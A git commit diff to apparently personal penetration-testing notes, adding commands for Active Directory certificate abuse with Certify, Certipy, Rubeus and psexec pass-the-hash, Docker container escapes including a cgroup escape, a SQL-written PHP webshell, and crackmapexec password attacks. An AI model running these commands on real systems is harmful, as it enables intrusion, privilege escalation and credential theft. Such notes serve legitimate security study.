AD certificate and docker escapes

This commit is contained in:
whackx 2024-01-11 05:40:49 +01:00
parent 74845509af
commit bbef002f0a
3 changed files with 87 additions and 48 deletions

View File

@ -29,6 +29,14 @@ Exploitable templates should have the following traits:
* Client authentication EKU for Kerberos authentication --> `Client Authentication` * Client authentication EKU for Kerberos authentication --> `Client Authentication`
* Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT` * Permission to subject alternative name (SAN), e.g. URL to encrypt. Used to create Kerberos ticket, --> `CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT`
#### Certify
Find information about all registered CAs. For a start take a look at least at
```sh
Certify.exe find /vulnerable
```
### Certificate Creation ### Certificate Creation
* `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (Request Certificate if administration account --> Computer Account) * `Win+R` --> `mmc` --> `File` --> `Add/Remove Snap-in` --> `Certificates` (Request Certificate if administration account --> Computer Account)
@ -36,18 +44,25 @@ Exploitable templates should have the following traits:
* After that in the main menu, `Personal` --> `Certificates` --> __The certificate__ * After that in the main menu, `Personal` --> `Certificates` --> __The certificate__
* Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save * Right click certificate --> `All Tasks` --> `Export` --> `Yes, export private key` --> `PFX` --> set `Password` --> Save
* An alternative is certipy-ad An alternative is certipy-ad
#### Certipy-AD
First `pip install certipy-ad`
Take a look at the Documentation provided in the [git repositories'
README](https://github.com/ly4k/Certipy?source=post_page-----c56f238991c0--------------------------------#esc7).
Since it is possible to create certifcates of (Sub)CAs if you do have the right permissions on CA directly, it is worth a check.
[Hacktricks' AD CS Domain Escalation](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation) provides the details.
### Impersonation ### Impersonation
* Request TGT with the created cert Request TGT with the created cert.
* Grab TGT
* On the machine via #### On the target machine via
```sh ```sh
Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller> Rubeus.exe asktgt /user:<user (UPN) of cert> /enctype:aes256 /certificate:<path to certificate> /password:<certificate file password> /outfile:<name of file to write TGT to.kirbi> /domain:<domain name> /dc:<IP of domain controller>
``` ```
* Select a domain admin via opening `Active Directory Users and Computers` Select a domain admin via opening `Active Directory Users and Computers`
```sh ```sh
.\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser> .\Rubeus.exe changepw /ticket:<ticketfilename> /new:<new password> /dc:<domain of controller> /targetuser:<domain>\<dauser>
``` ```
@ -61,6 +76,13 @@ exit
dir \\<domain>\<dir>$\ dir \\<domain>\<dir>$\
``` ```
#### On the attacking machine
Use impacket's psexec
```sh
psexec.py $DOMAIN/administrator@$DOMAIN -hashes $found_hash -dc-ip $DC_IP
```
## CVE-2022-26923 ## CVE-2022-26923
* Aims on abusing templates configuration, the Subject Alternative Name `SAN`. Set it to someone with higher permissions * Aims on abusing templates configuration, the Subject Alternative Name `SAN`. Set it to someone with higher permissions

View File

@ -54,45 +54,39 @@ curl http://example.com:5000/v2/<REPOSITORY>/tags/list
curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG> curl http://test.com:5000/v2/<REPO>/<APP>/manifest/<TAG>
``` ```
## Reversing Docker Images ## Remote Docker Daemon
* [Dive](https://github.com/wagoodman/dive) Users inside the `docker` group may open tcp socket through docker
In case you find an exposed docker daemon it can be used in the following way
```sh ```sh
dive <IMAGE-ID> docker -H tcp://$TARGET_IP:2375 ps
docker -H tcp://$TARGET_IP:2375 images
docker -H tcp://test.com:2375 exec <container> <cmd>
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
``` ```
## Uploading Images to Registry
* Ever image has a `latest` tag
* Upload modified docker image as `latest`
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
## RCE via Exposed Docker Daemon ## RCE via Exposed Docker Daemon
* Users inside the `docker` group may open tcp socket through docker Execute commands on socket
* `nmap -sV -p- <IP> -vv` to find exposed tcp sockets via docker
* Confirming via `curl http://test.com:2375/version` on open docker port
* Execute commands on socket
```sh ```sh
docker -H tcp://test.com:2375 ps
docker -H tcp://test.com:2375 exec <container> <cmd>
docker -H tcp://$TARGET_IP:2375 run -it -v /:/mnt/host alpine:3.9 /bin/sh
``` ```
* [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease) * [root please](https://registry.hub.docker.com/r/chrisfosterelli/rootplease)
## Escape Container via Exposed Docker Daemon ## Escape Container via Exposed Docker Daemon
* Looking for exposed docker sockets Look out for exposed docker sockets
```sh ```sh
find / -name "*sock" 2>/dev/null find / -name "*sock" 2>/dev/null
groups groups
``` ```
* Mount the host volume and chroot to it, need alpine image. Mount the host volume and chroot to it. Ideally, use an image that is
installed already, e.g. alpine here.
```sh ```sh
docker images docker images
@ -107,34 +101,27 @@ docker run -v /:/host --rm -it <imageID> chroot /host/ bash
## Shared Namespaces ## Shared Namespaces
* Namespaces Requires root inside the container
* Cgroups
* OverlayFS
* Requires root inside the container
* Execute command
```sh ```sh
nsenter --target 1 --mount sh nsenter --target 1 --mount sh
nsenter --target 1 --mount --uts --ipc --net /bin/bash
``` ```
## Misconfiguration ## Misconfiguration
### capabilities ### Capabilities
* Privileged container connect to the host directly, not through the docker engine Privileged container connect to the host directly, not through the docker engine.
* Execution of bins on the host from libs inside the container is possible Execution of binaries on the host from inside the container is possible.
```sh ```sh
capsh --print capsh --print
``` ```
* `man capabilities`
* [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.) * [PoC](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/#:~:text=The%20SYS_ADMIN%20capability%20allows%20a,security%20risks%20of%20doing%20so.)
* Exploit and get a reverse shell to the host via Exploit and get a reverse shell to the host via
```sh ```sh
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
@ -147,7 +134,7 @@ chmod a+x /exploit
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs" sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
``` ```
* The file may appear outside the container on the host system Caveat: The file may appear outside the container on some host systems. Have to investigate...
### cap_admin ### cap_admin
@ -169,8 +156,8 @@ the docker volume, e.g.
## Check fdisk ## Check fdisk
* `fdisk -l` and `lsblk`, host bulk device may be exposed `fdisk -l` and `lsblk`, host bulk device may be exposed
* Mount the device Mount the device
```sh ```sh
mkdir /mnt/hostdev mkdir /mnt/hostdev
@ -218,6 +205,20 @@ Connection: Upgrade
Upgrade: tcp Upgrade: tcp
``` ```
## Reversing Docker Images
* [Dive](https://github.com/wagoodman/dive)
```sh
dive <IMAGE-ID>
```
## Uploading Images to Registry
* Ever image has a `latest` tag
* Upload modified docker image as `latest`
* [Article](https://www.trendmicro.com/vinfo/us/security/news/virtualization-and-cloud/malicious-docker-hub-container-images-cryptocurrency-mining)
## Escape through DB ## Escape through DB
* Login into DB * Login into DB
@ -226,14 +227,14 @@ Upgrade: tcp
* Select table content into a file the user can read * Select table content into a file the user can read
* Execute the file * Execute the file
```sql ```SQL
create table h4x0r (pwn varchar(1024)); create table h4x0r (pwn varchar(1024));
insert into h4x0r (pwn) values ('<?php $cmd=$_GET["cmd"];system($cmd);?>'); insert into h4x0r (pwn) values ('<?php $cmd=$_GET["cmd"];system($cmd);?>');
select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r INTO OUTFILE '/var/www/html/shell.php'; select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r INTO OUTFILE '/var/www/html/shell.php';
copy (select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r) to '/var/www/html/shell.php'; # In case of PostreSQL copy (select '<?php $cmd=$_GET["cmd"];system($cmd);?>' from h4x0r) to '/var/www/html/shell.php'; # In case of PostreSQL
``` ```
* curl the webshell hon the exploited host curl the webshell hon the exploited host
```sh ```sh
curl <host-IP>/shell.php?cmd=id curl <host-IP>/shell.php?cmd=id

View File

@ -1,23 +1,39 @@
# Crackmapexec # Crackmapexec
* Dictionary attack against SMB ## Dictionary attack against SMB
```sh ```sh
cme smb domain.name -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt cme <smb/mssql> <domain/IP> -u <user> s -p /usr/share/seclists/Passwords/Leaked-Databases/rockyou.txt --continue-on-sucess --no-brute
``` ```
* Use the password with `impacket/examples/psexec.py` in the following way
## Brute Force attack against SMB
Brute force attack using an anonymous user
```sh
cme smb <TARGET_IP> -u anonymous -p "" --rid-brute 10000
```
## Use Found Password
Use the password with `impacket/examples/psexec.py` in the following way
```sh ```sh
psexec.py domain.name/<user>:<password>@<target-IP> psexec.py domain.name/<user>:<password>@<target-IP>
``` ```
## Shares ## Enumerate Shares
* Check user permissions on shares Check user permissions on shares
``sh
```sh
crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares crackmapexec smb 10.200.x.0/24 -u <user> -p <password> --shares
``` ```
## SMB ## SMB
* Check user hash on the network via smb
Check user hash on the network via smb
```sh ```sh
crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash> crackmapexec smb 10.200.x.0/24 -u <user> -d <domain> -H <hash>
``` ```